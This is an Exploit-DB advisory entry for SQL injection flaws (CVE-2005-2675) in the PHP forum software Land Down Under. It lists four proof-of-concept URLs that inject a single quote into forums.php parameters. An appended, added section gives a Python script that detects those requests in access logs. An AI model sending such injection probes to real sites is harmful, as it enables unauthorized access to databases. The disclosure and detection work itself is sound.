Exploit Land Down Under 800/801 - 'forums.php' Multiple SQL Injections

Exploiter

18 Dec 2022
EDB-ID
26180
EDB verified
  1. Passed
Author
BL2K
Vulnerability type
WEBAPPS
Platform
PHP
CVE
cve-2005-2675
Publication date
2005-08-20
Code:
source: https://www.securityfocus.com/bid/14618/info
   
Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
   
Successful exploitation may allow the attacker to compromise the application, retrieve sensitive information, modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
http://www.example.com/ldu/forums.php?m=topics&q=3&n=' 
http://www.example.com/ldu/forums.php?m='&q=3&n=last 
http://www.example.com/ldu/forums.php?m=topics&s='
 
Source
www.exploit-db.com
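
A detection sketch for the request patterns listed above, added here as an example and not part of the original advisory or of Land Down Under. It scans web-server access logs for `forums.php` requests in which any of the parameters shown in the advisory's URLs (`m`, `q`, `n`, `s`, `x`) carries a single quote, raw or percent-encoded; the log format (common/combined), the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that carry the quote character in the advisory's forums.php URLs.
WATCHED_PARAMS = {"m", "q", "n", "s", "x"}

# Request field of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Aug/2005:10:00:01 +0000] "GET /ldu/forums.php?m=topics&q=3&n=last HTTP/1.1" 200 5120
198.51.100.7 - - [20/Aug/2005:10:00:05 +0000] "GET /ldu/forums.php?m=topics&q=3&n=%27 HTTP/1.1" 200 812
198.51.100.7 - - [20/Aug/2005:10:00:06 +0000] "GET /ldu/forums.php?m='&q=3&n=last HTTP/1.1" 200 799
192.0.2.10 - - [20/Aug/2005:10:00:09 +0000] "GET /ldu/index.php?x=' HTTP/1.1" 200 4000
""".splitlines()


def quoted_params(target):
    """Return sorted names of watched forums.php parameters whose
    URL-decoded value contains a single quote."""
    parts = urlsplit(target)
    if not parts.path.endswith("/forums.php"):
        return []
    hits = set()
    # parse_qsl percent-decodes values, so %27 and a raw ' are treated alike.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and "'" in value:
            hits.add(name)
    return sorted(hits)


def scan(lines):
    """Yield (line_number, client_address, parameter_names) per matching line."""
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = quoted_params(match.group(1))
        if params:
            yield lineno, line.split(" ", 1)[0], params


if __name__ == "__main__":
    for lineno, client, params in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent a quote in {', '.join(params)}")
```

A hit is a lead for review rather than proof of compromise, and parameters sent in POST bodies do not appear in access logs at all.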
